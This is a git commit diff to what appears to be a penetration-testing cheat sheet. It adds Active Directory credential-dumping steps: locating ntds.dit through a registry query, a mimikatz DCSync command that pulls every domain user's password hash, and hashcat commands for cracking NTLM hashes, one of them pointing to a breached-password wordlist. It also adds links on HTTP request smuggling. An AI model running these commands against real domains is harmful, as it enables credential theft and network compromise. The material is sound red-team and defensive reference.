NTLM Hashcat

patch-1
Swissky 2020-11-06 16:20:03 +01:00
parent 6a82f47f32
commit bd184487e5
2 changed files with 44 additions and 1 deletions

View File

@ -539,9 +539,19 @@ New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArgumen
### Dumping AD Domain Credentials ### Dumping AD Domain Credentials
You will need the following files to extract the ntds : You will need the following files to extract the ntds :
- ntds file (C:\Windows\NTDS\ntds.dit) - NTDS.dit file
- SYSTEM hive (C:\Windows\System32\SYSTEM) - SYSTEM hive (C:\Windows\System32\SYSTEM)
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
However you can change the location to a custom one, you will need to query the registry to get the current location.
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
```
#### Using ndtsutil #### Using ndtsutil
```powershell ```powershell
@ -653,7 +663,11 @@ cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
```powershell ```powershell
# DCSync only one user
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
# DCSync all users of the domain
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
``` ```
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
@ -668,6 +682,30 @@ sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt lsadump::lsa /inject /name:krbtgt
``` ```
#### Crack NTLM hashes with hashcat
Useful when you want to have the clear text password or when you need to make stats about weak passwords.
Recommended wordlists:
- rockyou (available in Kali Linux)
- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound)
- Collection #1 (passwords from Data Breaches, might be illegal to possess)
```powershell
# Basic wordlist
# (-O) will Optimize for 32 characters or less passwords
# (-w 4) will set the workload to "Insane"
$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2
# Generate a custom mask based on a wordlist
$ git clone https://github.com/iphelix/pack/blob/master/README
$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask
$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
- [hashes.org](https://hashes.org/check.php)
- [hashes.com](https://hashes.com/en/decrypt/hash)
### Password spraying ### Password spraying

View File

@ -2,11 +2,15 @@
## Summary ## Summary
* [Tools](#tools)
* [CL.TE vulnerabilities](#cl.te-vulnerabilities) * [CL.TE vulnerabilities](#cl.te-vulnerabilities)
* [TE.CL vulnerabilities](#te.cl-vulnerabilities) * [TE.CL vulnerabilities](#te.cl-vulnerabilities)
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
* [References](#references) * [References](#references)
## Tools
* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
## CL.TE vulnerabilities ## CL.TE vulnerabilities
@ -101,3 +105,4 @@ Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating
## References ## References
* [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling) * [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)